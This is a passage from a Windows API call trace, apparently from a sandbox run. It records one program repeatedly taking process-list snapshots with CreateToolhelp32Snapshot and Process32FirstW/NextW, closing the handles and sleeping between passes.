lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0155.462] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0155.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0155.465] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0155.465] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.543] CloseHandle (hObject=0xbc) returned 1 [0155.543] Sleep (dwMilliseconds=0x12c) [0155.859] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0155.866] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.929] CloseHandle (hObject=0xc4) returned 1 [0155.929] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0155.935] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.033] CloseHandle (hObject=0xbc) returned 1 [0156.033] Sleep (dwMilliseconds=0x12c) [0156.337] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0156.342] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.378] CloseHandle (hObject=0xc4) returned 1 [0156.378] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0156.382] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.439] CloseHandle (hObject=0xbc) returned 1 [0156.439] Sleep (dwMilliseconds=0x12c) [0156.742] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0156.754] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.792] CloseHandle (hObject=0xc4) returned 1 [0156.792] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0156.799] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.900] CloseHandle (hObject=0xbc) returned 1 [0156.900] Sleep (dwMilliseconds=0x12c) [0157.211] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0157.217] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.258] CloseHandle (hObject=0xc4) returned 1 [0157.258] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0157.264] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.360] CloseHandle (hObject=0xbc) returned 1 [0157.360] Sleep (dwMilliseconds=0x12c) [0157.664] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0157.670] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.718] CloseHandle (hObject=0xc4) returned 1 [0157.718] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0157.725] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.845] CloseHandle (hObject=0xbc) returned 1 [0157.845] Sleep (dwMilliseconds=0x12c) [0158.147] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0158.181] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.239] CloseHandle (hObject=0xc4) returned 1 [0158.239] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0158.247] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.396] CloseHandle (hObject=0xbc) returned 1 [0158.396] Sleep (dwMilliseconds=0x12c) [0158.739] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0158.744] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.871] CloseHandle (hObject=0xc4) returned 1 [0158.871] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0158.875] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.987] CloseHandle (hObject=0xbc) returned 1 [0158.987] Sleep (dwMilliseconds=0x12c) [0159.289] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0159.295] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.376] CloseHandle (hObject=0xc4) returned 1 [0159.376] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0159.384] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.519] CloseHandle (hObject=0xbc) returned 1 [0159.519] Sleep (dwMilliseconds=0x12c) [0160.088] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0160.094] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.203] CloseHandle (hObject=0xc4) returned 1 [0160.203] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0160.209] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.304] CloseHandle (hObject=0xbc) returned 1 [0160.305] Sleep (dwMilliseconds=0x12c) [0160.889] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0160.901] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.026] CloseHandle (hObject=0xc4) returned 1 [0161.026] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0161.031] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.602] CloseHandle (hObject=0xbc) returned 1 [0161.602] Sleep (dwMilliseconds=0x12c) [0161.906] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0161.913] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.002] CloseHandle (hObject=0xc4) returned 1 [0162.002] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0162.008] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.135] CloseHandle (hObject=0xbc) returned 1 [0162.135] Sleep (dwMilliseconds=0x12c) [0162.528] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0162.534] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.737] CloseHandle (hObject=0xc4) returned 1 [0162.737] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0162.741] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.871] CloseHandle (hObject=0xbc) returned 1 [0162.871] Sleep (dwMilliseconds=0x12c) [0163.175] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0163.179] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.240] CloseHandle (hObject=0xc4) returned 1 [0163.240] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0163.245] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.336] CloseHandle (hObject=0xbc) returned 1 [0163.336] Sleep (dwMilliseconds=0x12c) [0167.184] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0167.231] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.425] CloseHandle (hObject=0xc4) returned 1 [0167.425] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0167.431] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.639] CloseHandle (hObject=0xbc) returned 1 [0167.639] Sleep (dwMilliseconds=0x12c) [0168.219] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0168.226] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.596] CloseHandle (hObject=0xc4) returned 1 [0168.596] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0168.812] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.065] CloseHandle (hObject=0xbc) returned 1 [0169.065] Sleep (dwMilliseconds=0x12c) [0169.564] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0169.580] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.743] CloseHandle (hObject=0xc4) returned 1 [0169.743] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0169.750] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.006] CloseHandle (hObject=0xbc) returned 1 [0170.006] Sleep (dwMilliseconds=0x12c) [0172.447] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0172.454] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.669] CloseHandle (hObject=0xc4) returned 1 [0172.669] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0172.674] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.789] CloseHandle (hObject=0xbc) returned 1 [0172.789] Sleep (dwMilliseconds=0x12c) [0173.101] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0173.106] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.265] CloseHandle (hObject=0xc4) returned 1 [0173.265] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0173.270] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.375] CloseHandle (hObject=0xbc) returned 1 [0173.375] Sleep (dwMilliseconds=0x12c) [0173.821] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0173.826] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.957] CloseHandle (hObject=0xc4) returned 1 [0173.957] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0173.961] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.095] CloseHandle (hObject=0xbc) returned 1 [0174.095] Sleep (dwMilliseconds=0x12c) [0174.433] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0174.438] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.560] CloseHandle (hObject=0xc4) returned 1 [0174.560] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0174.565] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.694] CloseHandle (hObject=0xbc) returned 1 [0174.694] Sleep (dwMilliseconds=0x12c) [0175.015] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0175.021] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.119] CloseHandle (hObject=0xc4) returned 1 [0175.120] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0175.124] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.213] CloseHandle (hObject=0xbc) returned 1 [0175.213] Sleep (dwMilliseconds=0x12c) [0175.525] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0175.529] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.567] CloseHandle (hObject=0xc4) returned 1 [0175.567] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0175.572] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.615] CloseHandle (hObject=0xbc) returned 1 [0175.615] Sleep (dwMilliseconds=0x12c) [0175.915] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0175.920] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.960] CloseHandle (hObject=0xc4) returned 1 [0175.960] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0175.965] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.006] CloseHandle (hObject=0xbc) returned 1 [0176.006] Sleep (dwMilliseconds=0x12c) [0176.511] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0176.516] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.560] CloseHandle (hObject=0xc4) returned 1 [0176.560] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0176.566] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.628] CloseHandle (hObject=0xbc) returned 1 [0176.628] Sleep (dwMilliseconds=0x12c) [0176.981] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0176.986] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.057] CloseHandle (hObject=0xc4) returned 1 [0177.057] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0177.062] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.140] CloseHandle (hObject=0xbc) returned 1 [0177.140] Sleep (dwMilliseconds=0x12c) [0177.556] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0177.562] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.601] CloseHandle (hObject=0xc4) returned 1 [0177.601] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0177.607] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.651] CloseHandle (hObject=0xbc) returned 1 [0177.651] Sleep (dwMilliseconds=0x12c) [0177.976] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0177.981] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, 